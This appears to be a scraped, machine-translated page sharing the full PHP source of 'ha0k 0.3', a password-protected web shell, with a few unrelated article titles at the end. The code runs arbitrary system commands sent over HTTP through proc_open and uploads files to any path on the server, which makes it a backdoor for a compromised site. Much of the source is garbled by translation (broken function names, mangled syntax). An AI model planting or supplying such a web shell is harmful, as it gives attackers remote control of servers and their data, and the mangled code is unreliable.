ha0k 0.3 PHP Web Trojan modified version _php instance

Copy Code code as follows:

<?php
Multiple users can be set here
$passwd = Array (' ha0k ' => ' ha0k '),
' HACKERDSB ' => ' HACKERDSB ');
/* Set the alias of the command here/*
$aliases = array (' ls ' => ' ipconfig '),
' ll ' => ' LS-LVHF ');
if (!isset ($_server[' Php_auth_user ')) | |! Isset ($_server[' PHP_AUTH_PW ') | |
!isset ($passwd [$_server[' Php_auth_user ']]) | |
$passwd [$_server[' Php_auth_user ']]!= $_server[' PHP_AUTH_PW ']) {
Header (' Www-authenticate:basic realm= "by ha0k");
Header (' http/1.0 401 Unauthorized ');
$authenticated = false;
}
else {
$authenticated = true;
/* Start Session * *
Session_Start ();
/* Initialize session. */
if (Empty ($_session[' CWD ')) | |!empty ($_request[' reset ')) {
$_session[' cwd '] = GETCWD (); Take the current directory
$_session[' History ' = Array ();
$_session[' output ' = ';
}
if (!empty ($_request[' command ')) {
if (GET_MAGIC_QUOTES_GPC ()) {//0 table closed, 1 table open, filter on open
/* We don ' t want to add the commands to the history in the
* Escaped form, so we remove the backslashes now. */
$_request[' Command ' = stripslashes ($_request[' command ')); Returns the string that is processed with the addslashes () function as is
}
* History * *
if (($i = array_search ($_request[' command ', $_session[' history '))!== false)//Find the value in the saved array
unset ($_session[' history '] [$i]); Destroyed
Array_unshift ($_session[' history '], $_request[' command '); the//array_unshift () function is to insert a new element in an array. And this new array will be added to the beginning of the original array. The function eventually returns the array after the new element is inserted.
/* Output ha0k# Command * *
$_session[' Output ']. = ' ha0k# '. $_request[' command '. "\ n";
/* Initialize the current working directory. */
if (Ereg (' ^[[:blank:]]*cd[[:blank:]]*$ ', $_request[' command ')) {
$_session[' cwd '] = dirname (__file__); Get current directory
} elseif (Ereg (' ^[[:blank:]]*cd[[:blank:]]+) ([^;] +) $ ', $_request[' command ', $regs)) {
/* The current command are a ' CD ' command which we have to handle
* As an internal shell command. */
if ($regs [1][0] = = '/') {
/* Absolute path, we use it unchanged. */
$new _dir = $regs [1];
} else {
/* Relative path, we append it to the current working
* Directory. */
$new _dir = $_session[' CWD ']. '/' . $regs [1];
}
/* Transform '/./' into '/' *
while (Strpos ($new _dir, '/./')!== false)
$new _dir = str_replace ('/./', '/', $new _dir);
* * Transform '//' into '/'/
while (Strpos ($new _dir, '//')!== false)
$new _dir = Str_replace ('//', '/', $new _dir);
* * Transform ' x/. '
while (Preg_match) (' |/\.\. \.) | ', $new _dir))
$new _dir = preg_replace (' |/?[ ^/]+/\.\. (?! \.) | ', ', $new _dir);
if ($new _dir = = ") $new _dir = '/';
/* Try to change directory. */
if (@chdir ($new _dir)) {//Change current directory
$_session[' cwd ' = $new _dir;
} else {
$_session[' Output ']. = "Cd:could not change to: $new _dir\n";
}
} else {
/* The command isn't a ' CD ' command, so we execute it
* Changing the directory and save the output. */
ChDir ($_session[' CWD ')); Change Directory
/* Alias Extension * *
$length = strcspn ($_request[' command ', "T"); Find \ t string, return position
$token = substr ($_request[' command '), 0, $length); Fetch string 0-\t
if (Isset ($aliases [$token]))
$_request[' command ' = $aliases [$token]. substr ($_request[' command '), $length);
$p = proc_open ($_request[' command '),//Execute script
Array (1 => array (' Pipe ', ' w '),
2 => Array (' Pipe ', ' w ')),
$io);
/* read out Send * *
while (!feof ($io [1])) {
$_session[' Output ']. = Htmlspecialchars (Fgets ($io [1]),//convert special characters to HTML character encoding
Ent_compat, ' GB2312 ');
}
/* read out * *
while (!feof ($io [2])) {
$_session[' Output ']. = Htmlspecialchars (Fgets ($io [2]),
Ent_compat, ' GB2312 ');
}
Fclose ($io [1]);
Fclose ($io [2]);
Proc_close ($p);//Close pipe
}
}
/* Build in JavaScript using command history * *
if (Empty ($_session[' history ')) {
$js _command_hist = ' "';
} else {
$escaped = Array_map (' addslashes ', $_session[' history '));
$js _command_hist = ' "", "'. Implode (' "," ', $escaped). ' "'; /make the array into a string
}
}
Header (' content-type:text/html; charset=gb2312 ');
Echo ' <?xml version= ' 1.0 ' encoding= ' GB2312 '?> '. "\ n";
?>
<?php
if (Is_uploaded_file ($HTTP _post_files[' userfile '] [' tmp_name ']) {
Copy ($HTTP _post_files[' userfile '] [' tmp_name '], $_post[' remotefile ']);
echo "Upload file succeeded:". $HTTP _post_files[' userfile ' [' name '];
}
?>
<! DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 strict//en"
"Http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd" >
<title>ha0k webshell</title>
<script type= "Text/javascript" language= "JavaScript" >
var current_line = 0;
var command_hist = new Array (<?php echo $js _command_hist?>);
var last = 0;
Function key (e) {
if (!e) var e = window.event;
if (E.keycode = = && Current_line < command_hist.length-1) {
Command_hist[current_line] = Document.shell.command.value;
current_line++;
Document.shell.command.value = Command_hist[current_line];
}
if (E.keycode = = && Current_line > 0) {
Command_hist[current_line] = Document.shell.command.value;
current_line--;
Document.shell.command.value = Command_hist[current_line];
}
}
function init () {
Document.shell.setAttribute ("AutoComplete", "off");
Document.shell.output.scrollTop = Document.shell.output.scrollHeight;
Document.shell.command.focus ();
}
</script>
<style type= "Text/css" >
<!--
. STYLE1 {
Color: #33FF33;
Font-weight:bold;
}
a:link {
Text-decoration:none;
}
a:visited {
Text-decoration:none;
}
a:hover {
Text-decoration:none;
}
a:active {
Text-decoration:none;
}
-->
</style>
<meta http-equiv= "Content-type" content= "text/html; charset=gb2312 "/><body onload= "init ()" >
<body bgcolor= "#$$$$$$" >
<body text= "1afa3a" >
<?php if (! $authenticated) {?>
<p>you failed to authenticate yourself to Phpshell. You can <a
href= "<?php echo $_server[' php_self ']?>" >reload</a> to try Again.</p>
<p>try reading the <a href= "INSTALL" >INSTALL</a> file if you ' re has
Problems with installing phpshell.</p>
</body>
<?php//
Exit
}
Error_reporting (E_all);
if (Empty ($_request[' rows ')) $_request[' rows ' = 10;
?>
<p> current directory is: <code><?php echo $_session[' CWD ']?></code></p>
<form name= "Shell" action= "<?php echo $_server[' php_self ']?>" method= "POST" >
<div>
<textarea name= "Output" readonly= "readonly" cols= "rows=" <?php echo $_request[' rows ']?> ">
<?php
$lines = substr_count ($_session[' output '), "\ n");
$padding = str_repeat ("\ n", max (0, $_request[' rows ']+1-$lines));
Echo RTrim ($padding. $_session[' output '));
?>
<</textarea>
</div><br>
<p class= "Prompt" >
$ <input class= "prompt" name= "command" type= "text"
onkeyup= "Key (event)" Size= "tabindex=" 1 ">
</p>
<p>
<input type= "Submit" value= "Execution"/>
<input type= "Submit" name= "reset" value= "restore"/>
Number of rows: <input type= "text" name= "Rows" value= "<?php echo $_request[' rows ']?>"/>
</p>
</form>
<form enctype= "Multipart/form-data" action= "" method= "POST" >
<input type= "hidden" name= "max_file_size" value= "1000000" >
<p> local filename: <input name= "UserFile" type= "File" >
<p> Remote file name: <input name= "RemoteFile" type= "text" >
<input type= "Submit" value= "Send" >
</form>
</body>

  McAfee (Mccafés Antivirus) prevents the Web page from being hanged on the horse's setup tutorial (finally do not open on the server side) we strongly recommend that the server install the Mcafee 8.5i version

The world's smallest PHP web Trojan one with a PHP Trojan prevention method